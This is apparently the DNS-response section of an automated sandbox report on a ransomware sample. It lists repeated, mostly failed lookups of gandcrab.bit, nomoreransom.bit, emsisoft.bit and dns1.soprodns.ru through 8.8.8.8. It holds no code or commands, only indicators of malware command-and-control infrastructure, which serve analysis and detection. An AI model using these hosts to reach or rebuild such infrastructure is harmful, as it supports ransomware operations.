                                    Sep 1, 2022 00:01:54.917856932 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:54.939847946 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:54.961664915 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:57.544912100 CEST8.8.8.8192.168.2.30xb069Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:57.616928101 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:57.637340069 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:57.657670021 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:57.680296898 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:57.700737000 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:59.361457109 CEST8.8.8.8192.168.2.30x34aeName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:59.421237946 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:59.443866014 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:59.462193966 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:01:59.482578039 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:59.500787973 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:00.540338039 CEST8.8.8.8192.168.2.30x6c80Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:00.602976084 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:00.623477936 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:00.645464897 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:00.665227890 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:00.686867952 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:01.711468935 CEST8.8.8.8192.168.2.30xe958Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:01.787820101 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:01.813957930 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:01.832298040 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:01.850697994 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:01.870028019 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:01.915724039 CEST8.8.8.8192.168.2.30xb069Server failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:02.924088001 CEST8.8.8.8192.168.2.30xb441Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:02.983864069 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:03.004199028 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:03.022608995 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:03.041289091 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:03.060731888 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:04.694045067 CEST8.8.8.8192.168.2.30xf2b7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:04.767615080 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:04.790055037 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:04.812170982 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:04.841615915 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:04.861390114 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:10.950472116 CEST8.8.8.8192.168.2.30x3f9eServer failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:11.704813957 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:11.725864887 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:11.746112108 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:11.766913891 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:11.787333965 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:11.967653036 CEST8.8.8.8192.168.2.30x3f9eServer failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:12.999161005 CEST8.8.8.8192.168.2.30x3f9eServer failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:14.387511015 CEST8.8.8.8192.168.2.30x3f9eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:14.971482038 CEST8.8.8.8192.168.2.30xfea3Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:15.014755964 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:15.035367012 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:15.056536913 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:15.078147888 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:15.099627018 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:16.448688984 CEST8.8.8.8192.168.2.30x80a9Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:16.488795042 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:16.509176016 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:16.530898094 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:16.553879023 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:16.580022097 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:16.991344929 CEST8.8.8.8192.168.2.30x731Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:17.021205902 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:17.048921108 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:17.068710089 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:17.089041948 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:17.109560966 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:17.505155087 CEST8.8.8.8192.168.2.30x80a9Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:18.361676931 CEST8.8.8.8192.168.2.30x84cbName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:18.389043093 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:18.408541918 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:18.427966118 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:18.449790001 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:18.479060888 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:18.912440062 CEST8.8.8.8192.168.2.30xfea3Server failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.401741028 CEST8.8.8.8192.168.2.30x49eaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.430453062 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:19.450289965 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.471883059 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:19.491760969 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.512691975 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:19.925700903 CEST8.8.8.8192.168.2.30xeae8Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.930727959 CEST8.8.8.8192.168.2.30xfea3Server failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.951675892 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:19.970587015 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.993907928 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:20.013947010 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:20.035240889 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:22.022486925 CEST8.8.8.8192.168.2.30xc65dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:22.050517082 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:22.069267035 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:22.074369907 CEST8.8.8.8192.168.2.30xc65dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:22.089488983 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:22.108500004 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:22.129991055 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:24.712889910 CEST8.8.8.8192.168.2.30x4e9Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:24.748702049 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:24.770515919 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:24.792413950 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:24.814188957 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:24.833614111 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:26.233566046 CEST8.8.8.8192.168.2.30x7b7eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.270071030 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:26.293915987 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.312290907 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:26.332462072 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.352917910 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:26.714562893 CEST8.8.8.8192.168.2.30x4e9Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.841078043 CEST8.8.8.8192.168.2.30x4e9Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.386841059 CEST8.8.8.8192.168.2.30x7b7eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.784187078 CEST8.8.8.8192.168.2.30xd306Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.817483902 CEST8.8.8.8192.168.2.30xd306Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.877135992 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:27.904680967 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.926455975 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:27.989053965 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:28.014046907 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:30.826258898 CEST8.8.8.8192.168.2.30xefc8Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:32.422898054 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:32.442924023 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:32.465111017 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:32.486720085 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:32.510637999 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:33.985611916 CEST8.8.8.8192.168.2.30xefc8Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.407073975 CEST8.8.8.8192.168.2.30x4560Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.435112000 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:34.459167957 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.484791994 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:34.489913940 CEST8.8.8.8192.168.2.30x4560Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.517954111 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.537820101 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:35.427285910 CEST8.8.8.8192.168.2.30xbc32Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:35.454541922 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:35.475027084 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:35.496222973 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:35.516345024 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:35.536685944 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:35.984587908 CEST8.8.8.8192.168.2.30x55acName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:36.012811899 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:36.034972906 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:36.053332090 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:36.071810961 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:36.091907978 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:38.631139994 CEST8.8.8.8192.168.2.30xf2bbName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:38.659338951 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:38.680645943 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:38.701905012 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:38.738066912 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:38.759218931 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:39.027879000 CEST8.8.8.8192.168.2.30xf2bbName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.143616915 CEST8.8.8.8192.168.2.30xf2bbName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.675185919 CEST8.8.8.8192.168.2.30x7eeaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.710722923 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:39.729000092 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.750302076 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:39.771075010 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.791596889 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:41.822036982 CEST8.8.8.8192.168.2.30x6727Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:41.861427069 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:41.881999969 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:41.902828932 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:41.921314955 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:41.941456079 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:42.283397913 CEST8.8.8.8192.168.2.30x6727Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.320070028 CEST8.8.8.8192.168.2.30x27eeName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.345973015 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:43.366689920 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.386923075 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:43.405071020 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.425419092 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:44.279233932 CEST8.8.8.8192.168.2.30xdd39Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.305149078 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:44.326653957 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.346456051 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:44.366677999 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.386941910 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:44.819075108 CEST8.8.8.8192.168.2.30x7cf8Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.846179008 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:44.864609003 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.886693001 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:44.908752918 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.929284096 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:46.625612020 CEST8.8.8.8192.168.2.30xa05dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:46.652822018 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:46.677609921 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:46.696248055 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:46.716310978 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:46.736613989 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:47.092792034 CEST8.8.8.8192.168.2.30xb75eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:47.096024036 CEST8.8.8.8192.168.2.30xa05dName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:47.119285107 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:47.137702942 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:47.159663916 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:47.179497957 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:47.199672937 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:02:47.295221090 CEST8.8.8.8192.168.2.30x27eeServer failure (2)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:48.169800997 CEST8.8.8.8192.168.2.30x9344Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
